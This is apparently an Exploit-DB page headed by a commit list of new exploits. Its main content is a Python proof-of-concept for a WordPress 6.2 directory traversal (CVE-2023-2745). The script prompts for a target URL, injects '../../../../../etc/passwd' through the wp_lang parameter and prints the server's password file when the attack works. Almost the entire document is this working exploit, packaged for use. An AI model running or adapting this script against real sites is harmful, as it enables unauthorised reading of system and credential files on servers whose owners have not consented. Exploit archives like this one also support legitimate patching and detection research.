6cef641858
9 changes to exploits/shellcodes/ghdb tar-fs 3.0.0 - Arbitrary File Write/Overwrite OpenSSH server (sshd) 9.8p1 - Race Condition Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS) WonderCMS 3.4.2 - Remote Code Execution (RCE) WordPress Core 6.2 - Directory Traversal Microsoft Windows 11 - Kernel Privilege Escalation Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
34 lines
No EOL
1.2 KiB
Python
Executable file
34 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: WordPress Core 6.2 - Directory Traversal
|
|
# Date: 2025-04-16
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# Version: = 6.2
|
|
# Tested on: Win, Ubuntu
|
|
# CVE : CVE-2023-2745
|
|
|
|
|
|
|
|
import requests
|
|
from colorama import init, Fore, Style
|
|
init(autoreset=True)
|
|
url = input("E.G https://example.com/wp-login.php : ")
|
|
payload = '../../../../../etc/passwd'
|
|
response = requests.get(url, params={'wp_lang': payload})
|
|
if response.status_code == 200:
|
|
if "root:x:0:0:root" in response.text:
|
|
print(Fore.GREEN + 'Exploit successful, accessed content:')
|
|
print(Fore.GREEN + response.text)
|
|
else:
|
|
print(Fore.YELLOW + 'Accessed content, but the expected file was
|
|
not found:')
|
|
print(Fore.YELLOW + response.text)
|
|
elif response.status_code in {400, 401, 403, 404}:
|
|
print(Fore.RED + f'Client error, status code: {response.status_code}')
|
|
elif response.status_code // 100 == 5:
|
|
print(Fore.RED + f'Server error, status code: {response.status_code}')
|
|
elif response.status_code // 100 == 3:
|
|
print(Fore.YELLOW + f'Redirection, status code:
|
|
{response.status_code}')
|
|
else:
|
|
print(f'Status code: {response.status_code}') |